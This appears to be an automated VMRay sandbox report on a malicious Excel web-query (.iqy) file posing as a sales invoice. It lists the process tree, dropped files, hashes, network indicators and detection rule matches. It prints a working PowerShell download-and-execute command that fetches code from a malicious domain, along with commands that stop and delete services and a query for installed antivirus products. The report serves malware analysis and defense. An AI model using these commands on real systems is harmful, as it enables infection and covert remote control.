VMRay Analyzer Report for Sample #1587234
Analyzer: VMRay Analyzer 2.2.1
Name Resolution
  URI 95.213.251.149  Resolved_To  Address 95.213.251.149
  URI brembotembo.com  Resolved_To
Process Tree

Process 1: excel.exe (PID 2092, parent PID 1496)
  Command line: "C:\Program Files\Microsoft Office\Office16\EXCEL.EXE"
  Working directory: C:\Users\qj4SUKboE\Desktop\
  Image: c:\program files\microsoft office\office16\excel.exe
  Relations: Child_Of x3
Process 2: msosync.exe (PID 2456, parent PID 2092)
  Command line: "C:\Program Files\Microsoft Office\Office16\MsoSync.exe"
  Working directory: C:\Users\qj4SUKboE\Desktop\
  Image: c:\program files\microsoft office\office16\msosync.exe
Process 3: msosync.exe (PID 1348, parent PID 2092)
  Command line: "C:\Program Files\Microsoft Office\Office16\MsoSync.exe"
  Working directory: C:\Users\qj4SUKboE\Desktop\
  Image: c:\program files\microsoft office\office16\msosync.exe
Process 4: cmd.exe (PID 2964, parent PID 2092)
  Command line: CMD.EXE /c C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -NoExit -c IEX ((new-object net.webclient).downloadstring(\"http://brembotembo.com/1.dat\"))
  Working directory: C:\Users\qj4SUKboE\Desktop\
  Image: c:\windows\system32\cmd.exe
  Relations: Child_Of, Created, Opened x5
Process 5: powershell.exe (PID 2532, parent PID 2964)
  Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -NoExit -c IEX ((new-object net.webclient).downloadstring(\"http://brembotembo.com/1.dat\"))
  Working directory: C:\Users\qj4SUKboE\Desktop\
  Image: c:\windows\system32\windowspowershell\v1.0\powershell.exe
  Relations: Child_Of, Created x2, Wrote_To x2, Read_From x5, Opened x74, Connected_To x3
Process 6: cmd_.exe (PID 2068, parent PID 2532)
  Command line: "C:\Users\QJ4SUK~1\AppData\Local\Temp\cmd_.exe"
  Working directory: C:\Users\qj4SUKboE\Desktop\
  Image: c:\users\qj4suk~1\appdata\local\temp\cmd_.exe
  Relations: Child_Of x9, Created x2, Read_From, Opened x4, Wrote_To, Deleted x12, Connected_To x2
Process 7: taskeng.exe (PID 1200, parent PID 820)
  Command line: taskeng.exe {7366205D-AB28-4705-9A68-ED75B1319F38} S-1-5-21-1335525288-214869617-2635229968-1000:EXB9WSP\qj4SUKboE:Interactive:Highest[1]
  Working directory: C:\Windows\system32\
  Image: c:\windows\system32\taskeng.exe
Process 8: taskeng.exe (PID 3056, parent PID 820)
  Command line: taskeng.exe {F0BF9717-EB8A-4C23-8803-85A71A393FD9} S-1-5-21-1335525288-214869617-2635229968-1000:EXB9WSP\qj4SUKboE:Interactive:LUA[1]
  Working directory: C:\Windows\system32\
  Image: c:\windows\system32\taskeng.exe
Process 10: cmd.exe (PID 2948, parent PID 2068)
  Command line: "C:\Windows\System32\cmd.exe" /C net.exe stop ammyy
  Working directory: C:\Users\qj4SUKboE\Desktop\
  Image: c:\windows\syswow64\cmd.exe
  Relations: Child_Of, Created, Opened x5
Process 11: cmd.exe (PID 2940, parent PID 2068)
  Command line: "C:\Windows\System32\cmd.exe" /C sc delete ammyy
  Working directory: C:\Users\qj4SUKboE\Desktop\
  Image: c:\windows\syswow64\cmd.exe
  Relations: Child_Of, Created, Opened x5
Process 12: cmd.exe (PID 2988, parent PID 2068)
  Command line: "C:\Windows\System32\cmd.exe" /C net.exe stop foundation
  Working directory: C:\Users\qj4SUKboE\Desktop\
  Image: c:\windows\syswow64\cmd.exe
  Relations: Child_Of, Created, Opened x5
Process 13: cmd.exe (PID 3008, parent PID 2068)
  Command line: "C:\Windows\System32\cmd.exe" /C sc delete foundation
  Working directory: C:\Users\qj4SUKboE\Desktop\
  Image: c:\windows\syswow64\cmd.exe
  Relations: Child_Of, Created, Opened x5
Process 14: net.exe (PID 2264, parent PID 2948)
  Command line: net.exe stop ammyy
  Working directory: C:\Users\qj4SUKboE\Desktop\
  Image: c:\windows\syswow64\net.exe
  Relations: Child_Of
Process 15: net.exe (PID 1344, parent PID 2988)
  Command line: net.exe stop foundation
  Working directory: C:\Users\qj4SUKboE\Desktop\
  Image: c:\windows\syswow64\net.exe
  Relations: Child_Of
Process 16: net1.exe (PID 176, parent PID 1344)
  Command line: C:\Windows\system32\net1 stop foundation
  Working directory: C:\Users\qj4SUKboE\Desktop\
  Image: c:\windows\syswow64\net1.exe
  Relations: Wrote_To, Opened
Process 17: sc.exe (PID 2360, parent PID 3008)
  Command line: sc delete foundation
  Working directory: C:\Users\qj4SUKboE\Desktop\
  Image: c:\windows\syswow64\sc.exe
  Relations: Wrote_To
Process 18: net1.exe (PID 1860, parent PID 2264)
  Command line: C:\Windows\system32\net1 stop ammyy
  Working directory: C:\Users\qj4SUKboE\Desktop\
  Image: c:\windows\syswow64\net1.exe
  Relations: Wrote_To, Opened
Process 19: sc.exe (PID 2916, parent PID 2940)
  Command line: sc delete ammyy
  Working directory: C:\Users\qj4SUKboE\Desktop\
  Image: c:\windows\syswow64\sc.exe
  Relations: Wrote_To
Process 21: wsus.exe (PID 2624, parent PID 2068)
  Command line: C:\ProgramData\Settings\wsus.exe
  Working directory: C:\Users\qj4SUKboE\Desktop\
  Image: c:\programdata\settings\wsus.exe
  Relations: Read_From, Created, Opened x11, Modified_Properties_Of, Connected_To
Process 22: cmd.exe (PID 2656, parent PID 2068)
  Command line: "C:\Windows\system32\cmd.exe" /c del C:\Users\QJ4SUK~1\AppData\Local\Temp\cmd_.exe >> NUL
  Working directory: C:\Users\qj4SUKboE\Desktop\
  Image: c:\windows\syswow64\cmd.exe
  Relations: Deleted, Created, Opened x5
Process 23: cmd.exe (PID 2688, parent PID 2068)
  Command line: "C:\Windows\system32\cmd.exe" /c del C:\Users\QJ4SUK~1\AppData\Local\Temp\cmd_.exe >> NUL
  Working directory: C:\Users\qj4SUKboE\Desktop\
  Image: c:\windows\syswow64\cmd.exe
  Relations: Wrote_To, Created, Opened x5
Artifacts

File: STD_OUTPUT_HANDLE
File: STD_INPUT_HANDLE
WinRegistryKey: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System
WinRegistryKey: HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor (values: DisableUNCCheck, EnableExtensions, DelayedExpansion, DefaultColor, CompletionChar, PathCompletionChar, AutoRun)
WinRegistryKey: HKEY_CURRENT_USER\Software\Microsoft\Command Processor (values: DisableUNCCheck, EnableExtensions, DelayedExpansion, DefaultColor, CompletionChar, PathCompletionChar, AutoRun)
File: conout$
File: c:\users\qj4sukboe\appdata\local\temp\cmd_.exe (exe)
  MD5: 3e3d2e9fe0976c4c8d4c6be03f5d7c79
  SHA1: b079b7235ac9ce53d564e8e81e1419f870fb7550
  SHA256: 30e2f8e905e4596946e651627c450e3cc574fdf58ea6e41cdad1f06190a05216
File: c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml (ps1xml)
File: c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml (ps1xml)
File: c:\windows\microsoft.net\framework64\v2.0.50727\config\machine.config (config)
File: conin$
File: STD_INPUT_HANDLE
File: STD_ERROR_HANDLE
File: STD_OUTPUT_HANDLE
Mutex: Global\.net clr networking
WinRegistryKey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN (value: StackVersion)
WinRegistryKey: HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell
WinRegistryKey: HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1
WinRegistryKey: HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine (value: ApplicationBase)
WinRegistryKey: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment (value: PSMODULEPATH)
WinRegistryKey: HKEY_CURRENT_USER\Environment (value: PSMODULEPATH)
WinRegistryKey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell (value: path)
WinRegistryKey: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog
WinRegistryKey: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application
WinRegistryKey: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell
WinRegistryKey: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
WinRegistryKey: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell
WinRegistryKey: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
WinRegistryKey: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell
WinRegistryKey: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
WinRegistryKey: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell
WinRegistryKey: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center
WinRegistryKey: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell
WinRegistryKey: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
WinRegistryKey: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell
WinRegistryKey: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security
WinRegistryKey: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System
WinRegistryKey: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell
WinRegistryKey: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
WinRegistryKey: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
WinRegistryKey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds (value: PipelineMaxStackSizeMB)
WinRegistryKey: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion (value: InstallationType)
WinRegistryKey: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance (values: Library, IsMultiInstance, First Counter)
WinRegistryKey: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance (values: CategoryOptions, FileMappingSize, Counter Names)
WinRegistryKey: HKEY_CURRENT_USER
WinRegistryKey: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
WinRegistryKey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
WinRegistryKey: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
DNSRecord: brembotembo.com
SocketAddress: brembotembo.com:80
NetworkConnection: HTTP to brembotembo.com:80
URI: brembotembo.com/1.dat (relation: Contains)
URI: None
URI: brembotembo.com/doc.xls (relation: Contains)
File: c:\programdata\settings\wsus_41a480.tmp (tmp)
  MD5: 192aead1e464431f616fc210ab18a6af
  SHA1: 84e0756eef6e66bd8cc9a42fee4fa69ab21964ca
  SHA256: ac3fb7067fed4e4db651f8261553d379a980eaa8756202b4a8daa8e88299a2ef
File: c:\programdata\settings
File: STD_INPUT_HANDLE
File: STD_OUTPUT_HANDLE
File: STD_ERROR_HANDLE
File: c:\programdata\settings\wsus.exe (exe)
  MD5: 0be249bf01a6b8380ab31aa3f75e62d3
  SHA1: 1caef216eccbc07949836f814dcd9818a4c75d6d
  SHA256: 7f61258418b89942aa8e7bf2563ce11a05402d3ccf405a18e3d0a4d7a7f9ee41
File: c:\programdata\ammyy\wmihost.exe (exe)
File: c:\programdata\ammyy\settings3.bin (bin)
File: c:\programdata\foundation\wmites.exe (exe)
File: c:\programdata\foundation\settings3.bin (bin)
File: c:\programdata\foundation1\wmites.exe (exe)
File: c:\programdata\foundation1\settings3.bin (bin)
File: c:\programdata\microsoft\wsus.exe (exe)
File: c:\programdata\microsoft\settings3.bin (bin)
File: c:\programdata\microsoft\enc
File: c:\programdata\ammyy
File: c:\programdata\foundation
File: c:\programdata\foundation1
Mutex:
URI: http://brembotembo.com/load.dat (relation: Contains)
File: STD_OUTPUT_HANDLE
File: STD_INPUT_HANDLE
WinRegistryKey: HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor (values, read 6 times: DisableUNCCheck, EnableExtensions, DelayedExpansion, DefaultColor, CompletionChar, PathCompletionChar, AutoRun)
WinRegistryKey: HKEY_CURRENT_USER\Software\Microsoft\Command Processor (values, read 6 times: DisableUNCCheck, EnableExtensions, DelayedExpansion, DefaultColor, CompletionChar, PathCompletionChar, AutoRun)
File: standard handles, 12 entries (STD_OUTPUT_HANDLE x7, STD_INPUT_HANDLE x3, STD_ERROR_HANDLE x2)
File: c:\programdata\settings\wsus.exe (exe)
File: c:\users\qj4sukboe\desktop\kfwsh6767yuhnr3hunjiweh78&*$y%3uefisgt67yuh*y#$urw
File: STD_INPUT_HANDLE
File: STD_OUTPUT_HANDLE
File: STD_ERROR_HANDLE
WinRegistryKey: HKEY_CURRENT_USER\SYSTEM\CurrentControlSet\Control (value: netsxuid = 52393308, REG_SZ)
WinRegistryKey: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services (value: netsxuid)
WinRegistryKey: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services
WinRegistryKey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System (value: EnableLUA)
SocketAddress: 185.222.202.139:80 TCP
NetworkSocket: 185.222.202.139:80 TCP (relation: Contains)
File: c:\users\qj4suk~1\appdata\local\temp\cmd_.exe (exe)
File: \device\null
File: STD_OUTPUT_HANDLE
File: STD_INPUT_HANDLE
File: STD_ERROR_HANDLE
File: \device\null
File: STD_OUTPUT_HANDLE
File: STD_INPUT_HANDLE
Analyzed Sample #1587234
Malware Artifacts
Sample-ID: #1587234
Job-ID: #1443257
This sample was analyzed by VMRay Analyzer 2.2.1 on a Windows 7 system
VTI Score: 100 (based on VTI Database Version 2.7)

Metadata of Sample File #1587234
Submission-ID: #1805193
File: C:\Users\qj4SUKboE\Desktop\Sales invoice Z12_01 copy.iqy.iqy (iqy)
  MD5: b9fdcd230f07ac2e62987fd620e42ca8
  SHA1: c1973ccf7000a0e45f501cb31ca37e9c10084f62
  SHA256: ca0da220f7691059b3174b2de14bd41ddb96bf3f02a2824b2b8c103215c7403c
  Relations: Opened_By

Metadata of Analysis for Job-ID #1443257
Timeout: False
Architecture: x86 64-bit
OS version: 6.1.7601.17514 (3844dbb9-2017-4967-be7a-a4a2c20430fa)
Analysis VM: win7_64_sp1-mso2016
True
160.291
OS: Windows 7
This is a property collection for additional information of VMRay analysis
VMRay Analyzer
VTI Rule Matches (category, score, rule, description, summary)

[Process] score 4/5, rule vmray_document_create_process: Creates process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe". (Creates process)
[Process] score 1/5, rule vmray_install_ipc_endpoint: Creates mutex with name "Global\.net clr networking". (Creates system object)
[Network] score 3/5, rule vmray_request_dns_by_name: Resolves host name "brembotembo.com". (Performs DNS request)
[Process] score 4/5, rule vmray_document_create_process: Creates process "C:\Users\QJ4SUK~1\AppData\Local\Temp\cmd_.exe". (Creates process)
[Process] score 4/5, rule vmray_document_create_process: Creates process "cmd". (Creates process)
[Process] score 4/5, rule vmray_document_create_process: Creates process "C:\Windows\system32\net.exe". (Creates process)
[Process] score 4/5, rule vmray_document_create_process: Creates process "C:\Windows\system32\sc.exe". (Creates process)
[Process] score 4/5, rule vmray_document_create_process: Creates process "C:\ProgramData\Settings\wsus.exe". (Creates process)
[Process] score 4/5, rule vmray_document_create_process: Creates process "C:\Windows\system32\cmd.exe". (Creates process)
[Anti Analysis] score 5/5, rule vmray_detect_av_by_wmi_query: Tries to detect antivirus software via WMI query: "select * from antivirusproduct". (Tries to detect the presence of antivirus software)
[Process] score 1/5, rule vmray_overwrite_code: Overwrites code to possibly hide behavior. (Overwrites code)
[File System] score 2/5, rule vmray_handle_with_suspicious_files: File "c:\users\qj4sukboe\appdata\local\temp\cmd_.exe" is a known suspicious file. (Associated with suspicious files)
[File System] score 2/5, rule vmray_handle_with_suspicious_files: File "c:\programdata\settings\wsus.exe" is a known suspicious file. (Associated with suspicious files)
[Network] score 3/5, rule vmray_tcp_out_connection: Outgoing TCP connection to host "185.222.202.139:80". (Connects to remote host)
[Network] score 4/5, rule vmray_reputation_url_malicious: URL "brembotembo.com/1.dat" is known as malicious URL. (Associated with known malicious/suspicious URLs)
[Network] score 4/5, rule vmray_reputation_url_malicious: URL "brembotembo.com/doc.xls" is known as malicious URL. (Associated with known malicious/suspicious URLs)
[Network] score 4/5, rule vmray_reputation_url_malicious: URL "http://brembotembo.com/load.dat" is known as malicious URL. (Associated with known malicious/suspicious URLs)
[Network] score 4/5, rule vmray_download_data_http_request: URL "brembotembo.com/1.dat". (Downloads data)
[Network] score 4/5, rule vmray_download_data_http_request: URL "brembotembo.com/doc.xls". (Downloads data)
[Network] score 4/5, rule vmray_download_data_http_request: URL "http://brembotembo.com/load.dat". (Downloads data)
[Network] score 2/5, rule establish_http_connection: URL "brembotembo.com/1.dat". (Connects to HTTP server)
[Network] score 2/5, rule establish_http_connection: URL "brembotembo.com/doc.xls". (Connects to HTTP server)
[Network] score 2/5, rule establish_http_connection: URL "http://brembotembo.com/load.dat". (Connects to HTTP server)
[PE] score 2/5, rule vmray_drop_pe_file: Drops file "c:\users\qj4sukboe\appdata\local\temp\cmd_.exe". (Drops PE file)
[PE] score 2/5, rule vmray_drop_pe_file: Drops file "c:\programdata\settings\wsus.exe". (Drops PE file)
[PE] score 3/5, rule vmray_execute_dropped_pe_file: Executes dropped file "c:\users\qj4sukboe\appdata\local\temp\cmd_.exe". (Executes dropped PE file)
[PE] score 3/5, rule vmray_execute_dropped_pe_file: Executes dropped file "c:\programdata\settings\wsus.exe". (Executes dropped PE file)